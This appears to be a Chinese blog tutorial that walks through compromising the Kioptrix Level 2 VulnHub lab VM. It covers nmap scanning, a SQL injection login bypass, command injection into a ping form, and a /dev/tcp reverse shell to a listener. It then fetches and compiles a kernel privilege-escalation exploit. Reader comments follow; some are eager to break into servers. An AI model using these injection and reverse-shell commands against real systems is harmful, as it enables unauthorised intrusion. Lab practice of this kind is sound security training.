这篇文章给大家聊聊关于全面指南:新手快速掌握服务器攻防技巧与Root权限获取,以及对应的知识点,希望对各位有所帮助,不要忘了收藏本站哦。
基础环境准备
1、安装Vmware虚拟机(不建议使用真机);
2、前往vulnhub下载测试镜像,下载地址
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
3、用Vmware安装下载镜像,安装完成后启动服务器(这就是我们的目标服务器了);
4、虚拟机安装kali操作系统,kali系统下载地址:
https://www.kali.org/downloads/(也可以选择其它操作系统,Kali关于渗透测试工具集成比较好);
以上基础环境可谷歌、百度自行安装,有问题可以反馈留言。
备注:目标服务器和Kali服务器网络需要配置同一个网段,默认选择Vmware的桥接模式即可。
操作流程
一、Kali系统IP查看
基础环境准备完毕,这时候需要打开我们的Kali服务器了,查看Kali服务器自身的IP,敲入ifconfig命令,查看到Kali系统自身IP地址为192.168.137.133。
二、扫描目标服务器IP地址
nmap -sP 192.168.137.1/24
经过nmap扫描后发现,同网段有192.168.137.88 的IP,这个IP就是我们此行的目标IP了。
三、扫描目标服务器开放端口
nmap -A -p 1-65535 192.168.137.88 -v5
扫描192.168.137.88这台服务器上开放的端口,发现目标服务器开放的端口比较多,其中有常见的3306和80端口,相信有一定经验的运维或者开发人员都知道,这两个端口代表Mysql服务和Http服务,后面攻击这台服务器就会通过常见的80端口进行操作
四、SQL注入操作
用浏览器访问http://192.168.137.88,发现是个登录页面,尝试用SQL注入,可登录到管理后台,此SQL注入原理是由于后台服务对用户输入的参数没有进行校验,直接进行SQL拼接,导致出现该漏洞。
登录后发现可看到管理员界面,这个界面是管理员用于查看机器是否能ping通的,测试输入localhost,点击submit,发现ping命令可以执行,然后这时可以用&& 符号连接其他命令,发现都能正常执行,这时想到我们可以利用反弹shell进行操作。
五、反弹Shell操作
Kali机器执行如下命令:
nc命令可以实现任意TCP/UDP端口的侦听,这里nc是作为server以TCP或UDP方式侦听4444端口(备注也可以指定其它端口)
nc -v -l -p 4444
浏览器上填写如下命令:
此命令是实现反弹shell,sh -i 打开一个交互的sh,/dev/tcp建立一个socket连接,>&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。
localhost && sh -i >& /dev/tcp/192.168.137.133/4444 0>&1
这时候发现自己的Kali机器上已经进入shell操作界面,这时候的shell就已经是目标机器的shell了(偷偷的窃喜一波)
查看目前的用户发现是apache用户,权限较低,无法创建、操作、删除文件,也没有权限进行sudo操作,如下图所示
六、提升权限到ROOT
这时执行 uname -a 命令,发现该系统用到的内核是2.6.9版本,如下图所示。
这时候就可以去谷歌搜索该内核版本是否存在高危漏洞,或者使用searchsploit工具进行搜索,幸运的是,网上已经有人针对该内核版本做过提权漏洞的脚本,如下图。
通过wget把该文件下载到服务器上,由于操作的终端是反弹shell的终端,rz命令不可用。如果文件较内容较少,可以手动编辑,这里我是直接本地用 python -m SimpleHTTPServer起个简单的静态文件服务,然后在服务器用wget命令下载。
下载完成后用gcc命令编译,然后执行编译后的文件,此时发现权限已经由普通的apache用户提权到root用户了,到此大功告成了,可以彻底做自己想做的事情了。
用户评论
这篇文章写的太棒了!我从零基础开始学习黑客到现在一直都在找着合适的教程,这个文章内容很详细易懂,真的可以从零开始一步步掌握。最重要的是,它强调了安全意识和责任的重要性, 这让我非常放心。
有9位网友表示赞同!
太酷了!我一直对黑客很感兴趣,想挑战一下自己看看能不能攻破服务器。这篇文章给我的启发很大,感觉现在就能动手实践了,期待能很快弄到ROOT权限!
有19位网友表示赞同!
这篇博文写的有点理论化,对于新手来说看不懂很多概念。建议作者可以添加更多实际操作步骤和案例,这样更容易理解和学习。
有16位网友表示赞同!
黑客入门确实需要勇气和毅力,不过这个标题感觉有點聳動,让人担心会不会触犯法律。还是建议大家学习黑客技术应该以学习和研究安全为主,切勿用于非法活动。
有18位网友表示赞同!
我曾经尝试过一些简单的服务器攻击,但总是卡在某个步骤上,不知道怎么解决。这篇博文的内容很全面,也许能解答我的疑问,让我能够顺利攻破服务器并获得ROOT权限
有14位网友表示赞同!
我虽然对黑客技术很感兴趣,但是我不赞成用它来进行非法入侵和破坏。学习黑客技术应该是为了保护自己和他人,增强网络安全意识。
有14位网友表示赞同!
文章内容丰富实用,通俗易懂,对于想入门黑客的读者来说非常有价值。不过一些技术术语可以添加解释,更容易让大家理解。
有7位网友表示赞同!
感觉这篇文章有点太简单了,攻破服务器真的只需要这些步骤吗?我怀疑作者可能没有深入讲解一些高级技术的攻防细节,对想要真正了解黑客的读者来说不够全面
有8位网友表示赞同!
我喜欢文章最后提到的安全意识和责任重要性。我们学习黑客技术的目的不是为了恶意入侵和破坏,而是为了更好地保护自己和他人,提升网络安全水平。
有10位网友表示赞同!
我是一个程序员,对计算机网络结构很感兴趣。这篇博客文章对我来说很有启发,让我对黑客攻击的原理有了更深入的了解。 希望能继续学习更多高级的黑客技术,提升自己的技能水平 。
有14位网友表示赞同!
这篇文章给了我很大的启发,我会认真学习它内容,希望能够掌握基本的网络安全知识和技巧,保护自己免受网络攻击的影响。
有13位网友表示赞同!
从零开始?感觉有点夸张,黑客这个领域需要很多底层知识的积累,光跟着步骤操作可行性很低。需要进行更深入的研究才能真正的掌握 。
有18位网友表示赞同!
文章内容介绍清晰易懂,对于初学者来说非常友好。特别是强调了安全意识和责任的重要性,让我对学习黑客技术有了更深刻的认识。
有8位网友表示赞同!
我一直想了解一下黑客攻击是如何进行的,这篇博文给了我很好的解答。希望作者能继续分享更多有趣的知识和技巧,我渴望了解更多关于黑客技术的秘密!
有15位网友表示赞同!
这篇文章对初学者来说很有帮助,将黑客攻击的操作步骤讲解得很详细,易于理解。但对于已经掌握基础知识的读者来说,可能有些重复或简单。
有11位网友表示赞同!
学习黑客技术需要付出大量的努力和时间,不能仅仅靠着一篇博文就能入门成功,还需要不断实践和学习,不断提升自己的技能水平。
有9位网友表示赞同!
我觉得这篇博客文章内容很棒,因为它不仅讲解了黑客攻击的原理,还强调了安全意识的重要性。希望更多人能够了解这些知识,并利用它来保护自己和他人。
有7位网友表示赞同!
黑客技术是一个快速发展的话题,需要不断学习新的知识和技能才能跟上时代的步伐。这篇博文只是一个入门级别的介绍,要想真正成为一名优秀的“黑客”,还需要不断的实践和探索!
有20位网友表示赞同!